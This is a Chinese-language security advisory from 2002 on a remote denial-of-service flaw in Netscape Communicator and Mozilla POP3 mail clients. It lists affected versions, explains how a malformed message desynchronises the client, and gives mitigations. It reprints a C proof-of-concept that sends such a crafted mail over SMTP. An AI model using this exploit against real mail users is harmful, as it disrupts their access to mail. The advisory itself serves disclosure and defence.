首页 -> 安全研究

安全研究

安全漏洞
Netscape / Mozilla畸形邮件POP3远程拒绝服务漏洞

发布日期:2002-06-12
更新日期:2002-06-20

受影响系统:

Mozilla Browser 1.0 RC2
Mozilla Browser 1.0 RC1
Mozilla Browser 0.9.9
Mozilla Browser 0.9.8
Mozilla Browser 0.9.7
Mozilla Browser 0.9.6
Mozilla Browser 0.9.5
Mozilla Browser 0.9.4.1
Mozilla Browser 0.9.4
Mozilla Browser 0.9.3
Mozilla Browser 0.9.2.1
Mozilla Browser 0.9.2
Netscape Communicator 6.2.1
Netscape Communicator 6.2
Netscape Communicator 6.1
Netscape Communicator 6.01a
Netscape Communicator 6.01
Netscape Communicator 6.0
Netscape Communicator 4.77
Netscape Communicator 4.76
Netscape Communicator 4.75
Netscape Communicator 4.74
Netscape Communicator 4.73
Netscape Communicator 4.72
Netscape Communicator 4.7
Netscape Communicator 4.61
Netscape Communicator 4.6
Netscape Communicator 4.5BETA
Netscape Communicator 4.51
Netscape Communicator 4.5
Netscape Communicator 4.08
Netscape Communicator 4.07
Netscape Communicator 4.06
Netscape Communicator 4.05
Netscape Communicator 4.04
Mozilla Browser 1.0
    - Apple MacOS 9.2.1
    - Apple MacOS 9.2
    - Apple MacOS 9.1
    - Apple MacOS 9.0.4
    - Apple MacOS 9.0
    - Apple MacOS 10.1.2
    - Apple MacOS 10.1.1
    - Apple MacOS 10.1
    - Apple MacOS 10.0.4
    - Apple MacOS 10.0.3
    - Apple MacOS 10.0.2
    - Apple MacOS 10.0.1
    - Apple MacOS 10.0
    - Linux系统  
    - Microsoft Windows XP
    - Microsoft Windows NT 4.0
    - Microsoft Windows ME
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000
    - NetBSD 1.5.2
    - Unix系统  
Netscape Communicator 6.2.2
    - Apple MacOS 9.2.1
    - Apple MacOS 9.2
    - Apple MacOS 9.1
    - Apple MacOS 9.0.4
    - Apple MacOS 9.0
    - Apple MacOS 10.1.2
    - Apple MacOS 10.1.1
    - Apple MacOS 10.1
    - Apple MacOS 10.0.4
    - Apple MacOS 10.0.3
    - Apple MacOS 10.0.2
    - Apple MacOS 10.0.1
    - Apple MacOS 10.0
    - Linux系统  
    - Microsoft Windows XP
    - Microsoft Windows NT 4.0
    - Microsoft Windows ME
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000
    - Unix系统  
不受影响系统:

Netscape Communicator 4.78
Mozilla Browser 1.1 Alpha
    - Apple MacOS 9.2.1
    - Apple MacOS 9.2
    - Apple MacOS 9.1
    - Apple MacOS 9.0.4
    - Apple MacOS 9.0
    - Apple MacOS 10.1.2
    - Apple MacOS 10.1.1
    - Apple MacOS 10.1
    - Apple MacOS 10.0.4
    - Apple MacOS 10.0.3
    - Apple MacOS 10.0.2
    - Apple MacOS 10.0.1
    - Apple MacOS 10.0
    - Microsoft Windows XP
    - Microsoft Windows NT 4.0
    - Microsoft Windows ME
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000
    - Unix系统  
描述:

BUGTRAQ  ID: 5002

Netscape Communicator和Mozilla是WEB浏览程序,支持mail和通过POP3服务器获得邮件。两个产品都支持广泛操作系统,包括Microsoft Windows和Linux操作系统。

Netscape Communicator和Mozilla在处理畸形邮件时存在漏洞,远程攻击者可以利用此漏洞进行拒绝服务攻击。

Netscape Communicator和Mozilla的POP3客户端在通过POP3服务器接收邮件时按照如下方式:

登录POP3服务器
获取邮件
删除邮件
退出

由于POP3客户端检查邮件通过判断新行中有'.'符号来决定是否停止下载信息,通过构建畸形邮件如在新的一行中放置'.'符号,然后在这个'.'下放置其他信息而使POP3客户端处理邮件顺序不同步,这样可导致POP3客户端不能访问新近信息或者删除恶意邮件,过多的此类邮件可导致产生拒绝服务。

<*来源:eldre8 (eldre@afturgurluk.org
  
  链接:http://archives.neohapsis.com/archives/bugtraq/2002-06/0103.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

eldre8(eldre@afturgurluk.org) 提供了如下测试程序:

/* this is the code that comes with my
* advisory #1 to illustrate this...
* eldre8 at afturgurluk (double dot minus one) org
*/

#include
#include
#include
#include
#include
#include
#include
#include

#define MX "localhost"
#define EHLO "EHLO mx\r\n"
#define MAIL "MAIL FROM: root@localhost\r\n"
#define RCPT "RCPT TO: root@localhost\r\n"
#define DATA "DATA\r\n"
#define QUIT "QUIT\r\n"

#define PORT 25

int sock;
char buffer[255];

void SigCatch() {
    fprintf(stderr, "\b\bbye!\n");
    close(sock);
    exit(0);
}

int main() {
    /* I was too lame to implement the command line... :) */
    int i;
    struct sockaddr_in sout;
    struct hostent *hp;

    signal(SIGINT, SigCatch);

    hp=gethostbyname(MX);
    sock=socket(AF_INET, SOCK_STREAM, 0);
    if (sock<0) {
        perror("sock");
        return -1;
    }

    sout.sin_family=AF_INET;
    sout.sin_port=htons(PORT);
    memcpy(&(sout.sin_addr), *(hp->h_addr_list), sizeof(struct in_addr));
    if (connect(sock, &sout, sizeof(sout))<0) {
        perror("connect");
        return -1;
    }
    recv(sock, buffer, 255, 0); /* receive the banner... */
    send(sock, EHLO, sizeof(EHLO), 0);
    recv(sock, buffer, 255, 0); /* receive the welcome message... */
    send(sock, MAIL, sizeof(MAIL), 0);
    recv(sock, buffer, 255, 0); /* receive the acknowledgement to mail from. */
    send(sock, RCPT, sizeof(RCPT), 0);
    recv(sock, buffer, 255, 0); /* idem, but for the rcpt to... */
    send(sock, DATA, sizeof(DATA), 0);
    recv(sock, buffer, 255, 0);
    i=sprintf(buffer, "b4d maIl 1n 4KT1oN!\n\x0a\x0d\x2e\x0d\x20\x0a\x0a\nblabla...\x0a\x20");
    *(buffer+i)="\x0";
    sprintf(buffer+i+1, "\n.\n");
    send(sock, buffer, i+1+3, 0); /* send the dumb thing ... */
    recv(sock, buffer, 255, 0);
    send(sock, QUIT, sizeof(QUIT), 0);
    recv(sock, buffer, 255, 0);
    close(sock);

    return 0;
}

建议:

临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 用户使用telnet连接POP3服务,使用dele mailNo.命令删除恶意邮件。

厂商补丁:

Mozilla
-------
Mozill 1.1版本已经修补此问题:

http://www.mozilla.org/releases/

Netscape
--------
目前netscape厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:


http://home.netscape.com/download/index.html



浏览次数:3910
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障